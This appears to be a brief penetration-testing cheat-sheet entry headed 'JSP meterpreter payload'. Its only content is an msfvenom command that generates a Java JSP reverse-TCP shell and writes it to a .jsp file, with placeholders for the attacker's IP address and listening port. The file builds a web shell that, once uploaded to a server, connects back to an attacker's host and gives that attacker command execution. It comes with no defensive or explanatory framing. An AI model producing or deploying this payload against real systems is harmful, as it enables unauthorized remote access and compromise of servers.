# JSP meterpreter payload
#
msfvenom -p java/jsp_shell_reverse_tcp \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
	-f raw -o ${NAME}.jsp